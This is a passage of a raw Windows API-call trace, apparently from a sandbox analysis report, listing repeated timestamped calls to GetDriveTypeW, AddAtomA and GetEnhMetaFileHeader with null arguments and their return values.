(lpRootPathName=0x0) returned 0x3 [0174.419] AddAtomA (lpString=0x0) returned 0x0 [0174.420] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.420] AddAtomA (lpString=0x0) returned 0x0 [0174.420] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.420] AddAtomA (lpString=0x0) returned 0x0 [0174.420] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.420] AddAtomA (lpString=0x0) returned 0x0 [0174.420] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.420] AddAtomA (lpString=0x0) returned 0x0 [0174.420] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.420] AddAtomA (lpString=0x0) returned 0x0 [0174.420] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.420] AddAtomA (lpString=0x0) returned 0x0 [0174.420] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.420] AddAtomA (lpString=0x0) returned 0x0 [0174.420] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.420] AddAtomA (lpString=0x0) returned 0x0 [0174.420] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.420] AddAtomA (lpString=0x0) returned 0x0 [0174.420] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.420] AddAtomA (lpString=0x0) returned 0x0 [0174.420] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.420] AddAtomA (lpString=0x0) returned 0x0 [0174.420] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.420] AddAtomA (lpString=0x0) returned 0x0 [0174.420] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.420] AddAtomA (lpString=0x0) returned 0x0 [0174.421] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.421] AddAtomA (lpString=0x0) returned 0x0 [0174.421] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.421] AddAtomA (lpString=0x0) returned 0x0 [0174.421] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.421] AddAtomA (lpString=0x0) returned 0x0 [0174.421] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.421] AddAtomA (lpString=0x0) returned 0x0 [0174.421] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.421] AddAtomA (lpString=0x0) returned 0x0 [0174.421] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.421] AddAtomA (lpString=0x0) returned 0x0 [0174.421] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.421] AddAtomA (lpString=0x0) returned 0x0 [0174.421] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.421] AddAtomA (lpString=0x0) returned 0x0 [0174.421] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.421] AddAtomA (lpString=0x0) returned 0x0 [0174.421] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.421] AddAtomA (lpString=0x0) returned 0x0 [0174.421] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.421] AddAtomA (lpString=0x0) returned 0x0 [0174.421] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.422] AddAtomA (lpString=0x0) returned 0x0 [0174.423] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.423] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.423] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.423] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.423] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.423] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.423] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.423] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.423] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.423] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.423] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.423] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.423] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.423] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.423] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.423] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.423] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.423] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.423] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.423] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.423] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.423] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.423] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.424] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.425] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0174.426] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, 